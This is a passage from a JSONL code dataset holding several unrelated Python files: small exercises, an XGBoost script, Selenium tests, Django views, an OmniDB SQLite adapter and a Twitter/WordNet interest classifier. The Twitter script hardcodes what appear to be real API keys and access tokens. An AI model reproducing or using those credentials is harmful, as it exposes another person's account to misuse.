2/CadastroDeClientes/sistema.py","file_name":"sistema.py","file_ext":"py","file_size_in_byte":6161,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"}
{"seq_id":"42019478","text":"'''SETS'''\r\nset1 = set()\r\nset1size = int(input(\"Enter the size of first set: \"))\r\nfor i in range(0, set1size):\r\n set1Item = int(input())\r\n set1.add(set1Item)\r\nset2 = set()\r\nset2size = int(input(\"Enter the size of second set: \"))\r\nfor i in range(0, set2size):\r\n set2Item = int(input())\r\n set2.add(set2Item)\r\nprint(set1)\r\nprint(set2)\r\n\r\n'''1'''\r\ndiffset = set1 - set2\r\nprint(diffset)\r\ndiffset = set2 - set1\r\nprint(diffset)\r\n\r\n'''2'''\r\nissubset = set1 <= set2\r\nif issubset:\r\n print(\"First set is subset of Second set\")\r\nelse:\r\n print(\"First set is not a subset of Second set\")\r\nissubset = set2 <= set1\r\nif issubset:\r\n print(\"Second set is subset of First set\")\r\nelse:\r\n print(\"Second set is not a subset of First set\")\r\nissuperset = set2 >= set1\r\nif issuperset:\r\n print(\"Second set is superset of First set\")\r\nelse:\r\n print(\"Second set is not a superset of First set\")\r\nissuperset = set1 >= set2\r\nif issuperset:\r\n print(\"First set is superset of Second set\")\r\nelse:\r\n print(\"First set is not a superset of Second set\")\r\n\r\n'''3'''\r\nintersection = set1 & set2\r\nprint(\"The intersection of both sets:\" , 
intersection)","sub_path":"Sets.py","file_name":"Sets.py","file_ext":"py","file_size_in_byte":1181,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"378834349","text":"from alpaca_trade_api import Stream\n\nimport logging\nlogging.basicConfig(format='%(asctime)s %(levelname)5s %(module)s %(message)s',datefmt='%Y%m%d.%H:%M:%S',level=logging.DEBUG)\n\nsymbol = 'GOOG'\n\nstream = Stream()\n\nasync def quote_handler(quote): print('%s' % quote)\nasync def trade_handler(trade): print('%s' % trade)\nstream.subscribe_quotes(quote_handler,symbol)\nstream.subscribe_trades(trade_handler,symbol)\n\nasync def execution_handler(execution): print('%s' % execution)\nstream.subscribe_trade_updates(execution_handler)\n\nstream.run()\n","sub_path":"examples/exchanges/alpaca_ws.py","file_name":"alpaca_ws.py","file_ext":"py","file_size_in_byte":540,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"351632913","text":"import gc\nimport pandas as pd\nimport xgboost\nimport pickle\nimport numpy as np\nfrom datetime import datetime\nfrom matplotlib import pylab as plt\nimport operator\n#from sklearn.model_selection import train_test_split\n\n\nif __name__ == '__main__': \n t1 = datetime.now()\n print(\"Read data ... \" )\n \n r_f = pd.read_csv(\"data/f_feature.csv\")\n\n data = pd.read_pickle('data/data.pkl')\n \n train_all = pd.merge(data, r_f, on=['user_id', 'product_id'])\n \n del r_f\n del data\n gc.collect()\n \n train = train_all.sample(n=2400000)\n \n labels = train[['reordered']].values.astype(np.float32).flatten()\n train.drop(['product_id','order_id', 'user_id','reordered'], axis=1, inplace=True)\n\n \n del train_all\n gc.collect()\n \n print(\"Sample data ... \" )\n #train_1 = train.loc[:2400000,]\n #labels_1 = labels[:2400001]\n \n d_train = xgboost.DMatrix(train, labels)\n \n \n print(\"Train data ... 
\" )\n xgb_params = {\n \"objective\" : \"reg:logistic\"\n ,\"eval_metric\" : \"logloss\"\n ,\"eta\" : 0.1\n ,\"max_depth\" : 6\n ,\"min_child_weight\" :10\n ,\"gamma\" :0.70\n ,\"subsample\" :0.76\n ,\"colsample_bytree\" :0.95\n ,\"alpha\" :2e-05\n ,\"lambda\" :10\n }\n \n \n bst = xgboost.train(params=xgb_params, dtrain=d_train, num_boost_round=80, verbose_eval=10)\n \n importance = bst.get_fscore()\n imp = sorted(importance.items(), key=operator.itemgetter(1))\n df_imp = pd.DataFrame(imp)\n \n df_imp.to_pickle('data/df_imp.pkl')\n \n t2 = datetime.now()\n delta = t2 - t1\n print(\"Lapsed time in training : \" ,str(delta.total_seconds()))\n \n \n data_val = pd.read_pickle('data/data_val.pkl')\n d_test = xgboost.DMatrix(data_val)\n prediction = bst.predict(d_test)\n # prediction = model.predict(data_val)\n \n t3 = datetime.now()\n delta = t3 - t2\n print(\"Lapsed time in prediction : \" ,str(delta.total_seconds()))\n \n order_test = pd.read_pickle('data/result_head.pkl')\n orders = order_test.order_id.values\n products = order_test.product_id.values\n\n result = pd.DataFrame({'product_id': products, 'order_id': orders, 'prediction': prediction})\n #result.to_pickle('data/prediction_lgbm.pkl')\n result.to_csv('data/prediction_lgbm.csv', sep=',')\n \n t4 = datetime.now()\n delta = t4 - t1\n print(\"Lapsed time total : \" ,str(delta.total_seconds()))\n","sub_path":"imba403/lgbm_submition_part_2_xgb.py","file_name":"lgbm_submition_part_2_xgb.py","file_ext":"py","file_size_in_byte":2490,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"1203997","text":"from app.pageobject.pageobjectinfo import Selectors\nfrom app.utility.driverutility import Driverutility\nfrom app.utility.assertutility import Assertutility\nfrom selenium.webdriver.common.by import By\nfrom time import sleep\n\n\nclass Checkout(Driverutility, Assertutility):\n def search_product(self, driver):\n search_input_data = super().read_data(\"search\", \"camera\")\n webelement_search = driver.find_element(By.XPATH, Selectors.SEARCHINPUT)\n webelement_search.send_keys(search_input_data.get(\"search_keyword\"))\n super().select_input(webelement_search)\n super().wait_until_clickable(driver, \"xpath\", Selectors.SEARCHRESULT)\n webelement_search_header = driver.find_element(By.XPATH, Selectors.SEARCHRESULTHEAD)\n actual_header = super().get_text(webelement_search_header)\n expected_header = super().read_data(\"assert\", \"search_result\")\n super().check_equals(\n actual_header,\n expected_header.get(\"data\"),\n \"Actual: %s and expected: %s results are different\" % (actual_header, expected_header.get(\"data\"))\n )\n super().take_screenshot(driver)\n\n def click_product(self, driver):\n driver.find_element(By.XPATH, Selectors.PRODUCT1).click()\n super().check_element_present(driver, \"xpath\", Selectors.PRODUCTIMG)\n webelement_item = driver.find_element(By.XPATH, Selectors.ITEMHEAD)\n actual_item_text = super().get_text(webelement_item)\n expected_item_text = super().read_data(\"assert\", \"item_header\")\n super().check_equals(\n actual_item_text,\n expected_item_text.get(\"data\"),\n \"Actual: %s and expected: %s results are different\" % (actual_item_text, expected_item_text.get(\"data\"))\n )\n super().take_screenshot(driver)\n\n def add_to_cart(self, driver):\n driver.find_element(By.XPATH, Selectors.ADDINGTOCART).click()\n super().check_element_present(driver, \"xpath\", Selectors.ITEMINCART)\n super().scroll_down_to_pageend(driver)\n super().wait_until_clickable(driver, 
\"xpath\", Selectors.GOTOCART)\n super().check_element_present(driver, \"xpath\", Selectors.YOURCART)\n sleep(4)\n super().take_screenshot(driver)\n","sub_path":"app/pages/checkout.py","file_name":"checkout.py","file_ext":"py","file_size_in_byte":2246,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"43708287","text":"n = int(input())\n\n# Empty list\ntable = []\nscore_list = []\nempty = []\nunsorted = []\n\ndef repeat_cancel(score_list):\n for i in score_list:\n if i not in empty:\n empty.append(i)\n\n\ndef selection(table):\n for lst in table:\n if lst[1] == k:\n unsorted.append(lst[0])\n\n order = \"ABCDEFGHIJKLMNOPQRSTUVWXYZ\"\n for i in order:\n for j in unsorted :\n if i == j[0]:\n print(j)\n\nfor i in range(n):\n # Taking input\n name = input()\n score = float(input())\n # Appending [name,score] into the empty table\n # The [] is necessary (creating a list inside a list)\n table.append([name,score])\n\n # Appending score into score_list\n score_list.append(score)\n\na = sorted(score_list )\nrepeat_cancel(a)\n\nk = empty[1]\n\nselection(table)\n","sub_path":"Hackerrank/2_lowest_hr.py","file_name":"2_lowest_hr.py","file_ext":"py","file_size_in_byte":808,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"138985131","text":"\"\"\"Pomsheduler module views.\"\"\"\n\n# -*- coding: utf-8 -*-\n\nimport random\nimport datetime\nimport uuid\n\nfrom django.contrib.auth.models import User\nfrom django.contrib import messages\nfrom django.core.exceptions import PermissionDenied\nfrom django.core.urlresolvers import reverse\nfrom django.forms.models import inlineformset_factory\nfrom django.http import HttpResponseRedirect\nfrom django.shortcuts import get_object_or_404, Http404\nfrom django.utils.functional import curry\nfrom django.utils.translation import ugettext_lazy as _\nfrom django.views.generic.edit import FormMixin\nfrom django.views.generic import ListView\nfrom django.core.context_processors import csrf\nfrom django.shortcuts import render_to_response\nfrom django.template import RequestContext\n\nfrom pompsheduler import forms as pomp_form\nfrom pompsheduler import models\n\n\ndef gen_id_semaine(length=50):\n \"\"\"Generate identifient semaine.\"\"\"\n random = str(uuid.uuid4()).upper()\n random = random.replace('-', '')\n return random[:length]\n\ndef addprogramm(request, programm_id=None):\n template_name = \"frontend/pompsheduler/add_programm.html\"\n args = {}\n args.update(csrf(request))\n\n programm_formset = inlineformset_factory(\n models.SemaineId,\n models.Schedule,\n form=pomp_form.EmploiTempsForm,\n max_num=14,\n extra=14,\n formset=pomp_form.EmploiTempsFormSet,\n can_delete=False)\n # On envoi la variable user comme pramètre afin de charger\n # les données du adéquate au partenaire\n programm_formset.form = staticmethod(\n curry(pomp_form.EmploiTempsForm, request=request))\n\n if request.method == 'POST':\n dateform = pomp_form.EmploiTempsDateForm(request.POST)\n if dateform.is_valid():\n queryset_formset = programm_formset(\n request.POST, request.FILES)\n if queryset_formset.is_valid():\n create_semaineid = models.SemaineId()\n create_semaineid.id_semaine = gen_id_semaine()\n create_semaineid.date_debut = dateform.cleaned_data['datedebut']\n create_semaineid.date_fin = create_semaineid.date_debut + datetime.timedelta(days=6)\n create_semaineid.save()\n queryset_formset = programm_formset(\n request.POST, request.FILES, instance=create_semaineid)\n \n 
queryset_formset.save()\n messages.success(request, _('C\\'est bien! Programme créé avec succès.'))\n return HttpResponseRedirect(\n reverse(\n 'pompschedule:schedulelist',\n current_app=request.resolver_match.namespace,\n )\n )\n else:\n dateform = pomp_form.EmploiTempsDateForm()\n queryset_formset = programm_formset()\n args['dateform'] = dateform\n args['form'] = queryset_formset\n return render_to_response(\n template_name,\n args,\n context_instance=RequestContext(request)\n )\n\n\nclass ScheduleListView(ListView):\n \"\"\"This view lists the collaborators.\"\"\"\n\n context_object_name = \"result\"\n template_name = \"frontend/pompsheduler/schedule_list.html\"\n paginate_by = 10\n http_method_names = [u'get', u'post']\n\n def dispatch(self, request, *args, **kwargs):\n \"\"\"Dispatcher.\"\"\"\n # Check that the user exists, otherwise 404.\n if request.method.lower() in self.http_method_names:\n handler = getattr(\n self, request.method.lower(), self.http_method_not_allowed)\n else:\n handler = self.http_method_not_allowed\n self.request = request\n self.args = args\n self.kwargs = kwargs\n\n if 'user_id' in self.kwargs:\n if self.request.user.is_anonymous():\n messages.success(\n request, _(\n 'Cher visiteur, '\n 'vous devez vous connecter pour pouvoir générer un '\n 'programme de travail.'))\n return HttpResponseRedirect(\n reverse(\n 'account_login',\n current_app=request.resolver_match.namespace,\n )\n )\n self.user = get_object_or_404(\n User,\n pk=self.kwargs.get('user_id', None),\n )\n\n return handler(request, *args, **kwargs)\n\n def get_queryset(self):\n \"\"\"Custom get_queryset.\"\"\"\n queryset = models.Schedule.objects.order_by(\n 'semaineid',).distinct(\n 'semaineid')\n return queryset\n\n def get_context_data(self, **kwargs):\n \"\"\"Context data.\"\"\"\n context = super(ScheduleListView, self).get_context_data(**kwargs)\n context['meta_description'] = _(\n 'Listing de tous les programmes de travail du personnel employé.')\n return context\n\n\nclass DetailScheduleView(ListView):\n \"\"\"Detail view for one schedule, looked up by its identifier.\"\"\"\n\n context_object_name = \"result\"\n template_name = \"frontend/pompsheduler/detail_schedule.html\"\n http_method_names = [u'get']\n allow_empty = False\n\n def dispatch(self, request, *args, **kwargs):\n \"\"\"Dispatcher.\"\"\"\n # Check that the schedule exists, otherwise 404.\n if request.method.lower() in self.http_method_names:\n handler = getattr(\n self, request.method.lower(), self.http_method_not_allowed)\n else:\n handler = self.http_method_not_allowed\n # store the arguments before use; the base dispatch is bypassed here, so self.kwargs would otherwise never be set\n self.request = request\n self.args = args\n self.kwargs = kwargs\n\n if 'schedule_id' not in self.kwargs:\n raise PermissionDenied\n\n self.kwargs['detailschedule'] = models.Schedule.objects.filter(\n id_semaine=self.kwargs.get('schedule_id', None)).order_by(\n 'id_semaine').distinct('id_semaine')[:1]\n\n return handler(request, *args, **kwargs)\n\n def get(self, request, *args, **kwargs):\n \"\"\"Get element by kwargs.\"\"\"\n query = self.get_queryset()\n self.object_list = query.filter(id_semaine=self.kwargs.get(\n 'schedule_id', None))\n allow_empty = self.get_allow_empty()\n if not allow_empty and len(self.object_list) == 0:\n raise Http404(\n _(\n u\"Votre requête ne donne aucun résultat. 
\"\n \"Assurez-vous d\\' avoir réellement cliqué le lien.\"))\n context = self.get_context_data(object_list=self.object_list)\n return self.render_to_response(context)\n\n def get_queryset(self):\n \"\"\"Custom get_queryset.\"\"\"\n queryset = models.Schedule.objects.all()\n\n return queryset\n\n def get_context_data(self, **kwargs):\n \"\"\"Context data.\"\"\"\n context = super(DetailScheduleView, self).get_context_data(**kwargs)\n context['meta_description'] = _('Programme détaillé de la semaine')\n context['programm'] = self.kwargs['detailschedule'][0]\n return context\n","sub_path":"pompsheduler/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":7011,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"488115188","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\nimport datetime\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('myapp', '0028_auto_20150929_1012'),\n ]\n\n operations = [\n migrations.AddField(\n model_name='like',\n name='date_like',\n field=models.DateTimeField(default=datetime.datetime.now, blank=True),\n preserve_default=True,\n ),\n migrations.AddField(\n model_name='like',\n name='ip',\n field=models.IPAddressField(default='0.0.0.0'),\n preserve_default=False,\n ),\n ]\n","sub_path":"myapp/migrations/0029_auto_20150929_1019.py","file_name":"0029_auto_20150929_1019.py","file_ext":"py","file_size_in_byte":672,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"569216123","text":"'''\nThe MIT License (MIT)\n\nPortions Copyright (c) 2015-2018, The OmniDB Team\nPortions Copyright (c) 2017-2018, 2ndQuadrant Limited\n\nPermission is hereby granted, free of charge, to any person obtaining a copy\nof this software and associated documentation files (the \"Software\"), to deal\nin the Software without restriction, including without limitation the rights\nto use, copy, modify, merge, publish, distribute, sublicense, and/or sell\ncopies of the Software, and to permit persons to whom the Software is\nfurnished to do so, subject to the following conditions:\n\nThe above copyright notice and this permission notice shall be included in all\ncopies or substantial portions of the Software.\n\nTHE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\nIMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\nFITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. 
IN NO EVENT SHALL THE\nAUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\nLIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\nOUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\nSOFTWARE.\n'''\n\nimport os.path\nimport re\nfrom collections import OrderedDict\nfrom enum import Enum\nimport OmniDB_app.include.Spartacus as Spartacus\nimport OmniDB_app.include.Spartacus.Database as Database\nimport OmniDB_app.include.Spartacus.Utils as Utils\n\n'''\n------------------------------------------------------------------------\nTemplate\n------------------------------------------------------------------------\n'''\nclass TemplateType(Enum):\n EXECUTE = 1\n SCRIPT = 2\n\nclass Template:\n def __init__(self, p_text, p_type=TemplateType.EXECUTE):\n self.v_text = p_text\n self.v_type = p_type\n\n'''\n------------------------------------------------------------------------\nSQLite\n------------------------------------------------------------------------\n'''\nclass SQLite:\n def __init__(self, p_service, p_conn_id=0, p_alias='', p_foreignkeys=True):\n self.v_alias = p_alias\n self.v_db_type = 'sqlite'\n self.v_conn_string = ''\n self.v_conn_id = p_conn_id\n self.v_server = ''\n self.v_port = ''\n self.v_service = p_service\n self.v_user = ''\n self.v_schema = ''\n self.v_connection = Spartacus.Database.SQLite(p_service, p_foreignkeys)\n\n self.v_has_schema = False\n self.v_has_functions = False\n self.v_has_procedures = False\n self.v_has_sequences = False\n self.v_has_primary_keys = True\n self.v_has_foreign_keys = True\n self.v_has_uniques = True\n self.v_has_indexes = True\n self.v_has_checks = False\n self.v_has_excludes = False\n self.v_has_rules = False\n self.v_has_triggers = False\n self.v_has_partitions = True\n\n self.v_has_update_rule = True\n self.v_can_rename_table = True\n self.v_rename_table_command = \"alter table #p_table_name# rename to #p_new_table_name#\"\n self.v_create_pk_command = \"constraint #p_constraint_name# primary key (#p_columns#)\"\n self.v_create_fk_command = \"constraint #p_constraint_name# foreign key (#p_columns#) references #p_r_table_name# (#p_r_columns#) #p_delete_update_rules#\"\n self.v_create_unique_command = \"constraint #p_constraint_name# unique (#p_columns#)\"\n self.v_can_alter_type = False\n self.v_can_alter_nullable = False\n self.v_can_rename_column = False\n self.v_can_add_column = True\n self.v_add_column_command = \"alter table #p_table_name# add column #p_column_name# #p_data_type# #p_nullable#\"\n self.v_can_drop_column = False\n self.v_can_add_constraint = False\n self.v_can_drop_constraint = False\n self.v_create_index_command = \"create index #p_index_name# on #p_table_name# (#p_columns#)\";\n self.v_create_unique_index_command = \"create unique index #p_index_name# on #p_table_name# (#p_columns#)\"\n self.v_drop_index_command = \"drop index #p_index_name#\"\n self.v_update_rules = [\n \"NO ACTION\",\n\t\t\t\"RESTRICT\",\n\t\t\t\"SET NULL\",\n\t\t\t\"SET DEFAULT\",\n\t\t\t\"CASCADE\"\n ]\n self.v_delete_rules = [\n \"NO ACTION\",\n\t\t\t\"RESTRICT\",\n\t\t\t\"SET NULL\",\n\t\t\t\"SET DEFAULT\",\n\t\t\t\"CASCADE\"\n ]\n self.v_reserved_words = []\n self.v_console_help = \"Console tab.\"\n self.v_use_server_cursor = False\n\n def GetName(self):\n return self.v_service\n\n def PrintDatabaseInfo(self):\n if '/' in self.v_service:\n v_strings = self.v_service.split('/')\n return v_strings[len(v_strings)-1]\n else:\n return self.v_service\n\n def PrintDatabaseDetails(self):\n 
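# SQLite has no host or port to report, so the connection details are a fixed label\n 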
return 'Local File'\n\n def HandleUpdateDeleteRules(self, p_update_rule, p_delete_rule):\n v_rules = ''\n if p_update_rule.strip() != \"\":\n v_rules += \" on update \" + p_update_rule + \" \"\n if p_delete_rule.strip() != \"\":\n v_rules += \" on delete \" + p_delete_rule + \" \"\n return v_rules\n\n def TestConnection(self):\n v_return = ''\n try:\n if os.path.isfile(self.v_service):\n v_return = 'Connection successful.'\n else:\n v_return = 'File does not exist, if you try to manage this connection a database file will be created.'\n except Exception as exc:\n v_return = str(exc)\n return v_return\n\n def QueryTables(self):\n return self.v_connection.Query('''\n select name as table_name\n\t\t from sqlite_master\n\t\t\twhere type = 'table'\n ''', True)\n\n def QueryTablesFields(self, p_table=None):\n v_table_columns_all = Spartacus.Database.DataTable()\n v_table_columns_all.Columns = [\n 'column_name',\n 'data_type',\n 'nullable',\n 'data_length',\n 'data_precision',\n 'data_scale',\n 'table_name'\n ]\n if p_table:\n v_tables = Spartacus.Database.DataTable()\n v_tables.Columns.append('table_name')\n v_tables.Rows.append(OrderedDict(zip(v_tables.Columns, [p_table])))\n else:\n v_tables = self.QueryTables()\n for v_table in v_tables.Rows:\n v_table_columns_tmp = self.v_connection.Query(\"pragma table_info('{0}')\".format(v_table['table_name']), True)\n v_table_columns = Spartacus.Database.DataTable()\n v_table_columns.Columns = [\n 'column_name',\n 'data_type',\n 'nullable',\n 'data_length',\n 'data_precision',\n 'data_scale',\n 'table_name'\n ]\n for r in v_table_columns_tmp.Rows:\n v_row = []\n v_row.append(r['name'])\n if '(' in r['type']:\n v_index = r['type'].find('(')\n v_data_type = r['type'].lower()[0 : v_index]\n if ',' in r['type']:\n v_sizes = r['type'][v_index + 1 : r['type'].find(')')].split(',')\n v_data_length = ''\n v_data_precision = v_sizes[0]\n v_data_scale = v_sizes[1]\n else:\n v_data_length = r['type'][v_index + 1 : r['type'].find(')')]\n v_data_precision = ''\n v_data_scale = ''\n else:\n v_data_type = r['type'].lower()\n v_data_length = ''\n v_data_precision = ''\n v_data_scale = ''\n v_row.append(v_data_type)\n if r['notnull'] == '1':\n v_row.append('NO')\n else:\n v_row.append('YES')\n v_row.append(v_data_length)\n v_row.append(v_data_precision)\n v_row.append(v_data_scale)\n v_row.append(v_table['table_name'])\n v_table_columns.Rows.append(OrderedDict(zip(v_table_columns.Columns, v_row)))\n v_table_columns_all.Merge(v_table_columns)\n return v_table_columns_all\n\n def QueryTablesForeignKeys(self, p_table=None):\n v_fks_all = Spartacus.Database.DataTable()\n v_fks_all.Columns = [\n 'r_table_name',\n 'table_name',\n 'r_column_name',\n 'column_name',\n 'constraint_name',\n 'update_rule',\n 'delete_rule',\n 'table_schema',\n 'r_table_schema'\n ]\n if p_table:\n v_tables = Spartacus.Database.DataTable()\n v_tables.Columns.append('table_name')\n v_tables.Rows.append(OrderedDict(zip(v_tables.Columns, [p_table])))\n else:\n v_tables = self.QueryTables()\n for v_table in v_tables.Rows:\n v_fks_tmp = self.v_connection.Query(\"pragma foreign_key_list('{0}')\".format(v_table['table_name']), True)\n v_fks = Spartacus.Database.DataTable()\n v_fks.Columns = [\n 'r_table_name',\n 'table_name',\n 'r_column_name',\n 'column_name',\n 'constraint_name',\n 'update_rule',\n 'delete_rule',\n 'table_schema',\n 'r_table_schema'\n ]\n for r in v_fks_tmp.Rows:\n v_row = []\n v_row.append(r['table'])\n v_row.append(v_table['table_name'])\n v_row.append(r['to'])\n v_row.append(r['from'])\n 
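# the pragma exposes no constraint name, so one is synthesized from the table name plus the fk id, e.g. 'orders_fk_0'\n 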
v_row.append(v_table['table_name'] + '_fk_' + str(r['id']))\n v_row.append(r['on_update'])\n v_row.append(r['on_delete'])\n v_row.append('')\n v_row.append('')\n v_fks.Rows.append(OrderedDict(zip(v_fks.Columns, v_row)))\n v_fks_all.Merge(v_fks)\n return v_fks_all\n\n def QueryTablesPrimaryKeys(self, p_table=None):\n v_pks_all = Spartacus.Database.DataTable()\n v_pks_all.Columns = [\n 'constraint_name',\n 'column_name',\n 'table_name'\n ]\n if p_table:\n v_tables = Spartacus.Database.DataTable()\n v_tables.Columns.append('table_name')\n v_tables.Rows.append(OrderedDict(zip(v_tables.Columns, [p_table])))\n else:\n v_tables = self.QueryTables()\n for v_table in v_tables.Rows:\n v_pks_tmp = self.v_connection.Query(\"pragma table_info('{0}')\".format(v_table['table_name']), True)\n v_pks = Spartacus.Database.DataTable()\n v_pks.Columns = [\n 'constraint_name',\n 'column_name',\n 'table_name'\n ]\n for r in v_pks_tmp.Rows:\n if r['pk'] != 0:\n v_row = []\n v_row.append('pk_' + v_table['table_name'])\n v_row.append(r['name'])\n v_row.append(v_table['table_name'])\n v_pks.Rows.append(OrderedDict(zip(v_pks.Columns, v_row)))\n v_pks_all.Merge(v_pks)\n return v_pks_all\n\n # DOING\n def QueryTablesUniques(self, p_table=None):\n v_uniques_all = Spartacus.Database.DataTable()\n v_uniques_all.Columns = [\n 'constraint_name',\n 'column_name',\n 'table_name'\n ]\n if p_table:\n v_tables = self.v_connection.Query('''\n select name,\n sql\n from sqlite_master\n where type = 'table'\n and name = '{0}'\n '''.format(p_table), True)\n else:\n v_tables = self.v_connection.Query('''\n select name,\n sql\n from sqlite_master\n where type = 'table'\n ''', True)\n v_regex = re.compile(r\"\\s+\")\n for v_table in v_tables.Rows:\n v_sql = v_table['sql'].lower().strip()\n if 'unique' in v_sql:\n v_index = v_sql.find('(') + 1\n v_filtered_sql = v_sql[v_index : ]\n v_formatted = v_regex.sub(' ', v_filtered_sql)\n\n def QueryTablesIndexes(self, p_table=None):\n pass\n\n def QueryDataLimited(self, p_query, p_count=-1):\n if p_count != -1:\n self.v_connection.Open()\n v_data = self.v_connection.QueryBlock(p_query, p_count, True)\n self.v_connection.Close()\n return v_data\n else:\n return self.v_connection.Query(p_query, True)\n\n def QueryTableRecords(self, p_column_list, p_table, p_filter, p_count=-1):\n v_limit = ''\n if p_count != -1:\n v_limit = ' limit ' + p_count\n return self.v_connection.Query('''\n select {0}\n from {1} t\n {2}\n {3}\n '''.format(\n p_column_list,\n p_table,\n p_filter,\n v_limit\n ), True\n )\n\n def TemplateCreateTable(self):\n pass\n\n def TemplateAlterTable(self):\n pass\n\n def TemplateDropTable(self):\n return Template('DROP TABLE #table_name#')\n\n def TemplateCreateIndex(self):\n pass\n\n def TemplateDropIndex(self):\n pass\n","sub_path":"OmniDB/OmniDB_app/include/OmniDatabase/SQLite.py","file_name":"SQLite.py","file_ext":"py","file_size_in_byte":13396,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"12906345","text":"import re\nimport math\nimport tweepy\nfrom nltk import FreqDist\nfrom nltk.corpus import wordnet\n\n\n#for classifierV1\ndef taxonomy(cluster_name):\n hyponyms_first_level = []\n hyponyms_second_level = []\n hyponyms_thirt_level = []\n hyponyms_fourth_level = []\n tree_hyponyms = []\n tree_final = []\n for r in cluster_name:\n label_cluster = wordnet.synsets(r)\n\n ########################################################\n # In this section, i create a structure (tree style) of hyponyms until fourth depth level. 
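Hyponyms are WordNet's more specific senses, so each extra level fans the tree out quickly. 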
In this way\n # I improved the probability to find the most frequent words of the target X in the 'cluster' label considered\n # every structure contains only values of the its hyponyms\n for w in range(0, len(label_cluster)):\n x = label_cluster[w].hyponyms()\n if x:\n hyponyms_first_level.extend(label_cluster[w].hyponyms())\n\n for i in range(0, len(hyponyms_first_level)):\n x = hyponyms_first_level[i].hyponyms()\n if x:\n hyponyms_second_level.extend(x)\n\n for i in range(0, len(hyponyms_second_level)):\n x = hyponyms_second_level[i].hyponyms()\n if x:\n hyponyms_thirt_level.extend(x)\n\n for i in range(0, len(hyponyms_thirt_level)):\n x = hyponyms_thirt_level[i].hyponyms()\n if x:\n hyponyms_fourth_level.extend(x)\n\n tree_hyponyms.extend(hyponyms_first_level)\n tree_hyponyms.extend(hyponyms_second_level)\n tree_hyponyms.extend(hyponyms_thirt_level)\n tree_hyponyms.extend(hyponyms_fourth_level)\n\n tree_final.append([w for w in tree_hyponyms])\n tree_hyponyms.clear()\n hyponyms_first_level.clear()\n hyponyms_second_level.clear()\n hyponyms_thirt_level.clear()\n hyponyms_fourth_level.clear()\n return tree_final\n\n\ndef findToTreeHyponyms(listX,tree_hyponyms):\n\n for a in listX:\n word_without_label = wordnet.synsets(a[0])\n for z in word_without_label:\n for i in range(0,len(tree_hyponyms)):\n if (word_without_label):\n #s=z.wup_similarity(tree_hyponyms[i]) #Otherwise, return similarity, if it's very high and break cycle!\n if z == tree_hyponyms[i]:\n return 1,z\n\n return 0,0\n\n\ndef main_classifierV1(user_nameX,user_nameY,most_common1,most_common2,tree_hyponyms):\n cluster_label=[('music'),('physics'),('orientalism'),('philosophy'),('astronomy'),('art'),('history'),('politics')]\n\n print('ClassifierV1')\n print(user_nameX)\n for i in range(0,len(cluster_label)):\n result,hit=findToTreeHyponyms(most_common1,tree_hyponyms[i])\n if(result):\n print('Interest: ',cluster_label[i])\n\n print(user_nameY)\n for i in range(0, len(cluster_label)):\n result, hit = findToTreeHyponyms(most_common2,tree_hyponyms[i])\n if (result):\n print('Interest: ', cluster_label[i])\n print('\\n')\n\n\ndef sim_vectorial(doc_w1,doc_align_2,doc_w2):\n scalar_product=0.0\n lenght_norm2=0.0\n lenght_norm1=0.0\n for i in zip(doc_w1,doc_align_2):\n scalar_product= scalar_product + i[0]*i[1]\n\n for i in doc_w1:\n lenght_norm1=lenght_norm1 + math.pow(i,2)\n\n for a in doc_w2:\n lenght_norm2 = lenght_norm2 + math.pow(a,2)\n\n\n if scalar_product == 0: return 0 #totally different\n else:\n return (scalar_product/((math.sqrt(lenght_norm1)) * (math.sqrt(lenght_norm2))))\n\n\ndef get_data(source1,source2):\n # enter the corresponding information from your Twitter application ( these are my access credential):\n CONSUMER_KEY = 'NM4xHHBwm7fiBQjf0X4QfdN8X'\n CONSUMER_SECRET = 'u6pnGad8o11sNhLiY77voEbAUawHejgGiVgxKBwPFVKLyLyRbD'\n ACCESS_KEY = '251060755-lUeE2kxqXjMfL5hLqzmo4EuyuWo4wYmqcihTEU0o'\n ACCESS_SECRET = 'sUCSFY1PkPkVxVD5P96EixYzCjJnUapeXmzyJ8HQ1UW2s'\n auth = tweepy.OAuthHandler(CONSUMER_KEY, CONSUMER_SECRET)\n auth.set_access_token(ACCESS_KEY, ACCESS_SECRET)\n api = tweepy.API(auth, wait_on_rate_limit=True,\n wait_on_rate_limit_notify=True) # This is a standard of the server twitter, probably to prevent too many requests by bot\n\n list_tweetX = []\n list_tweetY = []\n\n # Get tweet post from target X and Y\n for page in tweepy.Cursor(api.user_timeline, id=source1).pages():\n for item in page:\n list_tweetX.append(item.text)\n\n for page in tweepy.Cursor(api.user_timeline, id=source2).pages():\n for item in 
